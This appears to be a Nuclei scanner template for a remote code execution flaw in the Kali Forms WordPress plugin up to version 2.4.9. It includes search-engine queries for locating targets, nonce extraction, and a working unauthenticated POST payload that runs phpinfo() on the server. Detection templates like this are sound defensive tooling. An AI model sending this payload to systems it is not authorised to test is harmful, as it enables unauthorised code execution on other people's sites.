id: CVE-2026-3584

info:
  name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    Kali Forms WordPress plugin <= 2.4.9 contains a remote code execution caused by unsafe user input handling in 'form_process' and 'prepare_post_data' functions, letting unauthenticated attackers execute code on the server, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 2.4.9.
  reference:
    - https://wordpress.org/plugins/kali-forms/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3584
    epss-score: 0.07239
    epss-percentile: 0.93569
    cwe-id: CWE-94
  metadata:
    verified: true
    # 5 candidate paths for request 1 + at most 1 confirming request 2.
    max-request: 6
    product: kali-forms
    framework: wordpress
    fofa-query: body="kali-forms"
    shodan-query: http.component:"WordPress" http.html:"kali-forms"
  tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev

# Two-stage check: request 1 locates a page that embeds a Kali Forms form and
# harvests the values request 2 needs; request 2 is only sent once request 1
# has matched, and only once (the loop breaks after the first hit).
flow: |
  // Likely locations of a rendered form; the first page on which request 1
  // matches (KaliFormsObject and ajax_nonce present) feeds request 2.
  const candidatePaths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"];
  for (const candidate of candidatePaths) {
    set("form_path", candidate);
    if (http(1)) {
      http(2);
      break;
    }
  }

http:
  # Request 1: discovery. Internal matcher/extractors only, so this stage is
  # never reported on its own.
  - raw:
      - |
        GET {{form_path}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "KaliFormsObject")'
          - 'contains(body, "ajax_nonce")'
        condition: and
        internal: true
    extractors:
      # Both values below are consumed by request 2 ({{nonce}}, {{form_id}}).
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'ajax_nonce":"([a-f0-9]+)"'
        internal: true
      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'data-form-id="(\d+)"'
        internal: true
      # Plugin version from an asset URL. Currently unused: nothing in the flow
      # or in the matchers references it, so the confirming request is not
      # gated on the version being <= 2.4.9.
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)'
        internal: true

  # Request 2: confirmation. A match means phpinfo() output came back in the
  # response, i.e. code execution is confirmed rather than inferred from a
  # version string. For log review, the corresponding server-side signal is a
  # POST to /wp-admin/admin-ajax.php with action=kaliforms_form_process.
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo

    matchers-condition: and
    matchers:
      # All three strings are required, which keeps a plain 200 page that
      # merely mentions "PHP Version" from matching.
      - type: word
        part: body
        words:
          - "phpinfo()"
          - "PHP Extension"
          - "PHP Version"
        condition: and
      - type: status
        status:
          - 200
    extractors:
      # Reported with the finding; useful for triage of the affected host.
      - type: regex
        name: php_version
        part: body
        group: 1
        regex:
          - 'PHP Version ([0-9.]+)'
# The digest below is a signature over the template content as originally
# published; any edit to the template (including whitespace) invalidates it
# and it must be regenerated (nuclei -sign) before the template is re-signed.
# digest: 4a0a0047304502203aa00f646a9b307da9caff214477aa98aa26f0e7754a75e5f33e4b294bfce6dc022100a8aa349dd63d13f38c57e38056c79a58870880d00aa2cf034fca856865a59c84:922c64590222798bb761d5b6d8e72950